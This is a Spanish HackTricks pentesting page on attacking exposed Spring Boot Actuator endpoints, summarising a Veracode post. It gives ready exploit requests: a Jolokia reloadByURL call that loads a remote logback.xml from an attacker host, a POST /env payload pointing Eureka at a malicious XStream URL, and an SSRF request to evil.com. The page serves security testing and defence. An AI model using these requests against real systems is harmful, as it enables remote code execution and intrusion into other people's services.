HackTricksSpring Actuators
Reading time: 4 minutes
tip
Aprende y practica Hacking en AWS:
HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: 
HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Hacking en Azure: 
HackTricks Training Azure Red Team Expert (AzRTE)
Apoya a HackTricks
- Revisa los planes de suscripci贸n!
- 脷nete al 馃挰 grupo de Discord o al grupo de telegram o s铆guenos en Twitter 馃惁 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.
Spring Auth Bypass
.png)
Desde https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png
Explotando Spring Boot Actuators
Consulta la publicaci贸n original en [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Puntos Clave:
- Spring Boot Actuators registra endpoints como
/health,/trace,/beans,/env, etc. En las versiones 1 a 1.4, estos endpoints son accesibles sin autenticaci贸n. A partir de la versi贸n 1.5, solo/healthy/infoson no sensibles por defecto, pero los desarrolladores a menudo desactivan esta seguridad. - Ciertos endpoints de Actuator pueden exponer datos sensibles o permitir acciones da帽inas:
/dump,/trace,/logfile,/shutdown,/mappings,/env,/actuator/env,/restart, y/heapdump.- En Spring Boot 1.x, los actuadores se registran bajo la URL ra铆z, mientras que en 2.x, est谩n bajo la ruta base
/actuator/.
T茅cnicas de Explotaci贸n:
- Ejecuci贸n de C贸digo Remoto a trav茅s de '/jolokia':
- El endpoint del actuador
/jolokiaexpone la Biblioteca Jolokia, que permite el acceso HTTP a MBeans. - La acci贸n
reloadByURLpuede ser explotada para recargar configuraciones de registro desde una URL externa, lo que puede llevar a XXE ciego o Ejecuci贸n de C贸digo Remoto a trav茅s de configuraciones XML manipuladas. - URL de ejemplo para explotaci贸n:
http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.
- Modificaci贸n de Configuraci贸n a trav茅s de '/env':
- Si las Bibliotecas de Spring Cloud est谩n presentes, el endpoint
/envpermite la modificaci贸n de propiedades ambientales. - Las propiedades pueden ser manipuladas para explotar vulnerabilidades, como la vulnerabilidad de deserializaci贸n de XStream en el Eureka serviceURL.
- Ejemplo de solicitud POST para explotaci贸n:
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
- Otras Configuraciones 脷tiles:
- Propiedades como
spring.datasource.tomcat.validationQuery,spring.datasource.tomcat.url, yspring.datasource.tomcat.max-activepueden ser manipuladas para varios exploits, como inyecci贸n SQL o alteraci贸n de cadenas de conexi贸n a la base de datos.
Informaci贸n Adicional:
- Una lista completa de actuadores por defecto se puede encontrar aqu铆.
- El endpoint
/enven Spring Boot 2.x utiliza formato JSON para la modificaci贸n de propiedades, pero el concepto general sigue siendo el mismo.
Temas Relacionados:
- Env + H2 RCE:
- Los detalles sobre la explotaci贸n de la combinaci贸n del endpoint
/envy la base de datos H2 se pueden encontrar aqu铆.
- SSRF en Spring Boot a trav茅s de la Interpretaci贸n Incorrecta de Nombres de Ruta:
- El manejo de par谩metros de matriz (
;) en nombres de ruta HTTP por parte del marco de Spring puede ser explotado para Server-Side Request Forgery (SSRF). - Ejemplo de solicitud de explotaci贸n:
http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
tip
Aprende y practica Hacking en AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica Hacking en GCP: HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Hacking en Azure: HackTricks Training Azure Red Team Expert (AzRTE)
Apoya a HackTricks
- Revisa los planes de suscripci贸n!
- 脷nete al 馃挰 grupo de Discord o al grupo de telegram o s铆guenos en Twitter 馃惁 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.